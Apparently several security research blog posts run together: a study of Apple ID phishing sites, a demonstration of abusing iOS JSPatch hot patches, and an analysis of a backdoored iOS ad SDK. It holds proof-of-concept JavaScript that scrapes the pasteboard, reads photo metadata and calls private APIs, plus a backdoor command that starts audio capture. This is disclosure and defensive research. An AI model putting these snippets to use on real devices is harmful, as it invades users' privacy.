Burp Suite is a tool for testing and attacking web applications: https://portswigger[.]net/burp/. The Burp session of a user supplying a login and password to the HTML form is shown in Figure 3. Here we can see five variables (u, p, x, y and cc) and a cookie being sent via the HTTP POST method to the page save.php.

Figure 3: Burp session

After the user enters a login and password, they are redirected and presented with the following Chinese Apple page, seen in Figure 4:  http://iClouddd[.]top/ask2.asp?MNWTK=25077126670584.html

Figure 4: Phishing page

On this page, all the links correctly point towards Apple[.]com, as can be seen in the HTML:

  * Apple <http://www.Apple[.]com/cn/>
  * <http://www.Apple[.]com/cn/shop/goto/bag>
  * Apple <http://www.Apple[.]com/cn/>
  * Mac <http://www.Apple[.]com/cn/mac/>
  * iPad <http://www.Apple[.]com/cn/ipad/>
  * iPhone <http://www.Apple[.]com/cn/iphone/>
  * Watch <http://www.Apple[.]com/cn/watch/>
  * Music <http://www.Apple[.]com/cn/music/>
  * <http://www.Apple[.]com/cn/support/>
  * Apple[.]com <http://www.Apple[.]com/cn/search>
  * <http://www.Apple[.]com/cn/shop/goto/bag>

Apple ID <https://Appleid.Apple[.]com/account/home>

  * <https://Appleid.Apple[.]com/zh_CN/signin>
  * Apple ID <https://Appleid.Apple[.]com/zh_CN/account>
  * <https://Appleid.Apple[.]com/zh_CN/#!faq>

When translated using Google Translate, the Chinese text written in the middle of the page (Figure 4) reads: “Verify your birth date or your device screen lock to continue”.

Next the user was presented with an ask3.asp webpage shown in Figure 5.

 

Figure 5: Phishing form asking for more details from victims

Translation: “Please verify your security question”

As shown in Figure 5, the page asks the user to answer three security questions, followed by redirection to an ok.asp page (Figure 6) on the same domain:

Figure 6: Successful submission phishing page

The final link points back to Apple[.]com. The complete trail using Burp suite tool is shown in Figure 7.

Figure 7: Burp session

We noticed that if the user tried to supply the same Apple ID twice, they got redirected to the page save[.]asp shown in Figure 8. Clicking OK on the popup redirected the user back to the main page.

Figure 8: Error prompt generated by phishing page

Domain Registration Information

We found that the registrant names for all of these phony Apple domains were these Chinese names: “Yu Hu”, “Wu Yan”, “Yu Fei” and “Yu Zhe”. Moreover, all these domains were registered with qq[.]com email addresses. Details are available in Table 1 below.

Table 1: Domain registration information

Looking closer at our malicious domain detection system, we observed that the system had been seeing similar domains at an increasing frequency. Analyzing the registration information, we found some interesting patterns. From January 2016 to the time of writing, the system marked around 240 unique domains that have something to do with Apple ID, iCloud or iTunes. From these 240 domains, we identified 154 unique email registrants, with 64 unique emails pointing to qq[.]com, 36 unique Gmail accounts, 18 unique email addresses each belonging to 163[.]com and 126[.]com, and a couple more registered with 139[.]com.

This information is vital, as it could be used in the following ways:

  • The domain list provided here could be used by Apple customers as a blacklist; they can avoid browsing to such domains and providing credentials to any of the listed domains, whether they receive them via SMS, email or via any instant messaging service.
  • The Apple credential phishing detection teams could use this information, as it highlights that all domains registered with these email addresses, registrant names and addresses, as well as their combinations, are potentially malicious and serving phishing content. This information could be used to block all future domains registered by the same entities.
  • Patterns emerging from this data reveal that for such campaigns, attackers prefer to use email addresses from Chinese services such as qq.com, 126.com and 138.com. It has also been observed that instead of names, the attackers have used numbers (such as 545454@qq[.]com and 891495200@qq[.]com) in their email addresses.

Geo-location

As seen in Figure 9, we observed all of these domains pointing to 13 unique IP addresses distributed across the U.S. and China, suggesting that these attacks were perhaps targeting users from these regions.

Figure 9: Geo-location plot of the IPs for this campaign

Campaign 2: British Apples Gone Bad

Our email attacks research team unearthed another targeted phishing campaign against Apple users in the UK. Table 2 is a list of 86 Apple phishing domains that we observed since January 2016.

 

Phishing Content and Analysis

All of these domains have been serving the same phishing content. A simple HTTP GET (via the wget utility) to the domain’s main page reveals HTML code containing a meta-refresh redirection to the signin.php page.

A wget session is shown here:

$ wget http://manageAppleid84913[.]net

--2016-04-05 16:47:44--  http://manageAppleid84913[.]net/

Resolving manageAppleid84913[.]net (manageAppleid84913[.]net)... 109.123.121.10

Connecting to manageAppleid84913[.]net (manageAppleid84913[.]net)|109.123.121.10|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 203 [text/html]

Saving to: ‘index.html.1’

 

100%[============================================================================================================>] 203         --.-K/s   in 0s      

 

2016-04-05 16:47:44 (37.8 MB/s) - ‘index.html.1’ saved [203/203]

Content of the page is displayed here:

<meta http-equiv="refresh" content="0;URL=signin.php?c=ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA==&log=1&sFR=ODIxNjMzMzMxODA0NTE4MTMxNTQ5c2RmZ3M1ZjRzNjQyMDQzNjgzODcyOTU2MjU5&email=" />

 

This code redirects the browser to this URL/page:

http://manageAppleid84913[.]net/signin.php?c=OTYwNzUyNjlGUjU0OTYwNTQ5NDY0MDgxMjQ4OTQ5OTk0MTQ3MDc1NjYyOA==&log=1&sFR=ODc0MjQyNTEyNzMyODE1NTMxNTQ5c2RmZ3M1ZjRzNjQzMDU5MjUzMzg4NDMzNzE1&email=#

This loads a highly obfuscated JavaScript in the web browser that, on execution, generates the phishing HTML code at runtime to evade signature-based phishing detection systems. This is seen in Figure 17 in Appendix 2, with a deobfuscated version of the HTML code being shown in Figure 18.

This code renders in the browser to create the fake Apple ID phishing webpage seen in Figure 10, which resembles the authentic Apple page https://Appleid.Apple[.]com/.

Figure 10: Screenshot of the phishing page as seen by the victims in the browser

On submitting a fake username and password, the form gets submitted to signin-box-disabled.php, and the JavaScript and jQuery create the page seen in Figure 11, informing the user that the Apple ID provided has been locked and that the user must unlock it:

Figure 11: Phishing page prompting victims to unlock their Apple IDs

Clicking on unlock leads the user to the page profile.php, which requests personal information such as name, date of birth, telephone numbers, addresses, credit card details and security questions, as shown in Figure 12. While filling out this form, we observed that the country part of the address drop-down menu only allowed address options from England, Scotland and Wales, suggesting that this attack is targeting these regions only.

Figure 12: User information requested by phishing page

On submitting false information on this form, the user would get a page asking to wait while the entered information is confirmed or verified. After a couple of seconds of processing, the page congratulates the user that their Apple ID was successfully unlocked (Figure 13). As seen in Figure 14, the user is then redirected to the authentic Apple page at https://Appleid.Apple[.]com/.

Figure 13: Account verification page displayed by the phishing site

Figure 14: After a successful attack, victims are redirected to the real Apple login page

Domain Registration Information

It was observed that all of these domains used the whois privacy protection feature offered by many registrars. This feature enables registrants to hide their personal and contact information, which would otherwise be available via the whois service. These domains were registered with the email “contact@privacyprotect[.]org”.

Geo-location

All these domains (Table 2) were pointing to IPs in the UK, suggesting that they were hosted in the UK.

Conclusion

Cybercriminals are targeting Apple users by launching phishing campaigns focused on stealing Apple IDs, as well as personal, financial and other information. We witnessed a high frequency of these targeted phishing attacks in the first quarter of 2016. A few phishing campaigns were particularly interesting because of their sophisticated evasion techniques (using code encoding and obfuscation), geographical targets, and because the same content was being served across multiple domains, which indicates the same phishing kits were being used.

One campaign we detected in March used sophisticated encoding/encryption techniques to evade phishing detection systems and provided a realistic looking Apple/iCloud interface. The majority of these domains were registered by individuals having email addresses pointing to Chinese services – registrant email, contact and address information points to China. Additionally, the domains were serving phony Apple webpages in Chinese, indicating that they were targeting Chinese users.

The second campaign we detected was launched against Apple users in the UK. This campaign used sophisticated evasion techniques (such as code obfuscation) to evade phishing detection systems and, whenever successful, was able to collect Apple IDs and personal and credit card information from its victims.

Organizations could use the information provided in this blog to protect their users from such sophisticated phishing campaigns by writing signatures for their phishing detection and prevention systems.

Credits and Acknowledgements

Special thanks to Yichong Lin, Jimmy Su, Mary Grace and Gaurav Dalal for their support.

Appendix 1

Figure 15: Obfuscated JavaScript served by the phishing site. In green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit-level binary operators.

Figure 16: Obfuscated JS served by the phishing site. In green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit-level binary operators. In red we have: XOR decoders.

Appendix 2

Figure 17: Obfuscated JavaScript content served by the site

Figure 18: Deobfuscated HTML content

For more information on phishing, please visit:

https://support.apple.com/HT203126
http://www.apple.com/legal/more-resources/phishing/
https://support.apple.com/HT204759

 

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching

Introduction

Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp://cnbang.net/bugfix.JS in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work to enable it is to add seven lines of code to the application:didFinishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp://cnbang.net/bugfix.JS that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of the JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app [1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4 [2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device


Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:


Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing any meaningful exploit in this blog post, but instead only pointing out the possibilities to avoid low-skilled attackers taking advantage of off-the-shelf exploits.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
b.     Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third-party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate between private framework usage by Apple's own apps and by third-party apps. It is simply App Store policy that bans third-party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process
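A hypothetical sketch of such a patch is shown below; it assumes the private BluetoothManager class exposes the commonly known +sharedInstance accessor, and is meant only to illustrate the pattern:

    // Load the private BluetoothManager.framework and enumerate connected devices.
    require('NSBundle');
    var bundle = NSBundle.bundleWithPath("/System/Library/PrivateFrameworks/BluetoothManager.framework");
    if (bundle.load()) {
        require('BluetoothManager');
        var bt = BluetoothManager.sharedInstance();   // private framework, private API
        var devices = bt.connectedDevices();
        for (var i = 0; i < devices.count(); i++) {
            console.log("connected device: " + devices.objectAtIndex(i).name());
        }
    }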

 

Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: /System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device
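As a rough sketch of what such a patch could look like (hypothetical; it assumes the CTRadioAccessTechnologyLTE constant's string value matches its name, which is how these constants are defined):

    // CoreTelephony.framework is already linked by the host app, so no extra loading is needed.
    require('CTTelephonyNetworkInfo');
    var netInfo = CTTelephonyNetworkInfo.alloc().init();
    console.log("before: " + netInfo.currentRadioAccessTechnology());
    netInfo.updateRadioAccessTechnology("CTRadioAccessTechnologyLTE");   // private API
    console.log("after:  " + netInfo.currentRadioAccessTechnology());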

 

Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user's photo album by leveraging the public APIs from the built-in Photos.framework to harvest the metadata of photos. With a bit more code, one can export this image data to a remote location without the user's knowledge.

Figure 15. JavaScript code that accesses the Photo Library
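A minimal sketch of such a patch might look like the following (hypothetical; it assumes the app already holds photo-library permission, and that PHAssetMediaTypeImage has the raw value 1):

    // Load the public Photos.framework and enumerate image assets.
    require('NSBundle');
    var bundle = NSBundle.bundleWithPath("/System/Library/Frameworks/Photos.framework");
    if (bundle.load()) {
        require('PHAsset');
        var assets = PHAsset.fetchAssetsWithMediaType_options(1, null);  // 1 == PHAssetMediaTypeImage
        console.log("image count: " + assets.count());
        var first = assets.firstObject();
        if (first) {
            console.log("first asset: " + first.pixelWidth() + "x" + first.pixelHeight());
        }
    }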

 

Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
b.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

The iOS pasteboard is one of the mechanisms that allows users to transfer data between apps. Some security researchers have raised concerns regarding its security, since the pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scrapes the pasteboard, which might contain sensitive information
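A minimal sketch of such a function, assuming only the public UIPasteboard API:

    // Scrape every string currently on the general pasteboard and log it.
    require('UIPasteboard');
    function dumpPasteboard() {
        var pb = UIPasteboard.generalPasteboard();
        var strings = pb.strings();              // may include passwords copied from other apps
        if (!strings) return;
        for (var i = 0; i < strings.count(); i++) {
            console.log("pasteboard[" + i + "]: " + strings.objectAtIndex(i));
        }
    }
    dumpPasteboard();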

 

Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS's native capability depends on C functions (for example, dlopen() and UIGetScreenImage()). Because C functions cannot be invoked reflectively, JSPatch cannot map them directly to JavaScript the way it maps Objective-C methods. To use C functions from JavaScript, an app must implement a JSExtension, which wraps each C function in a corresponding Objective-C interface that is then exported to JavaScript.

This dependency on additional Objective-C code to expose C functions places limits on the ability of a malicious actor to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limits are easily lifted should an app developer choose to add a bit more Objective-C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, provided there is enough demand. In that case, all of the above operations could become reality without Apple's consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to see that the JavaScript content, which is not subject to any review process, is a potential Achilles' heel in this app development architecture. Since there are few, if any, security measures to ensure the integrity of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackDoor in 2015 is an alarming example of misplaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

Figure 21. Threat model for JSPatch used by an app targeted by MITM

Field Survey

JSPatch originated in China. Since its release in 2015, it has seen wide adoption there. According to JSPatch, many popular and high-profile Chinese apps have adopted this technology. FireEye app scanning found a total of 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple's App Store for helping to keep iOS malware at bay. While it is undeniably true that the App Store plays a critical role in earning this acclaim, it comes at the cost of app developers' time and resources.

One of the manifestations of such a cost is the app hot patching process, where a simple bug fix has to go through an app review process that subjects the developers to an average waiting time of seven days before updated code is approved. Thus, it is not surprising to see developers seeking various solutions that attempt to bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers have doubts that the App Store would accept technologies leveraging scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues it is in compliance with Apple’s iOS Developer Program Information, which makes an exception to scripts and code downloaded and run by Apple's built-in WebKit framework or JavascriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality that are inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by App Store policy. JSPatch is walking a fine line, but it is not alone. In our coming reports, we intend to examine other hot patching solutions in search of one that satisfies both Apple and the developer community without jeopardizing users' security. Stay tuned!

 

[1] We have contacted the app provider regarding the issue. In order to protect the app vendor and its users, we have chosen not to disclose the app's identity until the issue is addressed.
[2] The redacted part is the hardcoded decryption key.

 

iBackDoor: High-Risk Code Hits iOS Apps

Introduction

FireEye mobile researchers recently discovered potentially “backdoored” versions of an ad library embedded in thousands of iOS apps originally published in the Apple App Store. The affected versions of this library embedded functionality in iOS apps that used the library to display ads, allowing for potential malicious access to sensitive user data and device functionality. NOTE: Apple has worked with us on the issue and has since removed the affected apps.

These potential backdoors could have been controlled remotely by loading JavaScript code from a remote server to perform the following actions on an iOS device:

  • Capture audio and screenshots
  • Monitor and upload device location
  • Read/delete/create/modify files in the app’s data container
  • Read/write/reset the app’s keychain (e.g., app password storage)
  • Post encrypted data to remote servers
  • Open URL schemes to identify and launch other apps installed on the device
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button

The offending ad library contained identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the potentially backdoored ad library: version codes 5.3.3 to 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2] – version 7.0.5 – the potential backdoors are not present. It is unclear whether the potentially backdoored versions of the ad library were released by adSage or if they were created and/or compromised by a malicious third party.

As of November 4, we have identified 2,846 iOS apps containing the potentially backdoored versions of mobiSage SDK. Among these, we observed more than 900 attempts to contact an adSage ad server capable of delivering JavaScript code to control the backdoors. We notified Apple of the complete list of affected apps and technical details on October 21, 2015.

While we have not observed the ad server deliver any malicious commands intended to trigger the most sensitive capabilities such as recording audio or stealing sensitive data, affected apps periodically contact the server to check for new JavaScript code. In the wrong hands, malicious JavaScript code that triggers the potential backdoors could be posted to eventually be downloaded and executed by affected apps.

Technical Details

As shown in Figure 1, the affected mobiSage library included two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the potential backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the potential backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.
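For illustration only, JavaScript running in that WebView could hand a command to the native side roughly as follows. The adsagejs://cmd&parameter scheme is taken from the library, but the payload shape shown here is an assumption, not the SDK's actual wire format (the real msageJS wraps this in the adsage.exec helper described later):

    // Hypothetical sketch: serialize a command and trigger a URL load that the
    // native WebView delegate (msageCore) intercepts and appends to its command queue.
    function sendCommand(className, methodName, args) {
        var parameter = encodeURIComponent(JSON.stringify({
            cls: className, sel: methodName, args: args
        }));
        var frame = document.createElement("iframe");   // hidden load; never rendered
        frame.style.display = "none";
        frame.src = "adsagejs://cmd&" + parameter;
        document.body.appendChild(frame);
    }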

Figure 2: Communication via URL loading in WebView

To process a command in its queue, msageCore dispatches the command, along with its parameters, to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

Figure 3: Command dispatch in msageCore

At-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name          Interfaces
MSageCoreUIManagerPlugin      captureAudio:, captureImage:, openMail:, openSMS:, openApp:, openInAppStore:, openCamera:, openImagePicker:, ...
MSageCoreLocation             start:, stop:, setTimer:, returnLocationInfo:webViewId:, ...
MSageCorePluginFileModule     createDir, deleteDir:, deleteFile:, createFile:, getFileContent:, ...
MSageCoreKeyChain             writeKeyValue:, readValueByKey:, resetValueByKey:
MSageCorePluginNetWork        sendHttpGet:, sendHttpPost:, sendHttpUpload:, ...
MSageCoreEncryptPlugin        MD5Encrypt:, SHA1Encrypt:, AESEncrypt:, AESDecrypt:, DESEncrypt:, DESDecrypt:, XOREncrypt:, XORDecrypt:, RC4Encrypt:, RC4Decrypt, ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the potential backdoors in the library. They expose the potential ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

Beyond the selected interfaces, the ad library potentially exposed users to additional risks by including logic to promote and install “enpublic” apps, as shown in Figure 4. As we have highlighted in previous blogs [3, 4, 5, 6, 7], enpublic apps can introduce additional security risks by using private APIs in certain versions of iOS. These private APIs potentially allow for background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations. Apple has addressed a number of issues related to enpublic apps that we have brought to their attention.

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

We can see how this ad library functions by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

Figure 5: Capturing audio with duration and threshold

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

Figure 6: Reading the keychain in the kSecClassGenericPassword class

Remote control in msageJS

msageJS contains JavaScript code for communicating with a remote server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

Figure 7: The file layout of msageJS

The command execution interface is constructed as follows:

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);
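The callbacks are ordinary JavaScript functions. A hypothetical location-monitoring invocation could therefore look like the following; the argument lists are placeholders, since, as noted above, the exact types and values have to be recovered by reversing msageCore:

    // Hypothetical sketch: start location monitoring and log whatever the native side returns.
    function onSuccess(result) { console.log("location result: " + JSON.stringify(result)); }
    function onFailure(error)  { console.log("location error: "  + JSON.stringify(error)); }

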